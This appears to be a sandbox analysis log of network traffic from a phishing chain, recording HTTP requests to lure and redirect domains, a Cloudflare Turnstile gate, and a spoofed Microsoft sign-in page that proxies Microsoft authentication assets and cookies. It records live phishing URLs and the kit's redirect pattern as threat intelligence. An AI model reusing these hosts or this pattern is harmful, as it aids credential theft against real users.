Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M
Source: global traffic	HTTP traffic detected: GET /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283 HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
Source: global traffic	HTTP traffic detected: GET /?mjalaytm&email=john.smith@microsoft.com HTTP/1.1Host: sso.ninerscorretora.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://proposaldocumentsviasecuredport.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com HTTP/1.1Host: sso.ninerscorretora.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://proposaldocumentsviasecuredport.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9261293dee55c468&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sso.ninerscorretora.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/9261293dee55c468/1742934575128/d51fc97ff5482a0e04d34c34824eb01eb3128cda53b4a0f70f6023263fe47e26/uPY28BXx41_v6Yh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3J1dGFhbm4uY29tLyIsImRvbWFpbiI6InJ1dGFhbm4uY29tIiwia2V5IjoiallDUmtvczlrNVowIiwicXJjIjoiam9obi5zbWl0aEBtaWNyb3NvZnQuY29tIiwiaWF0IjoxNzQyOTM0NTg1LCJleHAiOjE3NDI5MzQ3MDV9.7W_s5qzWUU25mO-CbJ3UwXVUaS65kZepZMklv62CLjs HTTP/1.1Host: rutaann.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?qrc=john.smith%40microsoft.com HTTP/1.1Host: rutaann.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://sso.ninerscorretora.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
Source: global traffic	HTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rutaann.com/?qrc=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global traffic	HTTP traffic detected: GET /?qrc=john.smith%40microsoft.com&sso_reload=true HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rutaann.com/?qrc=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
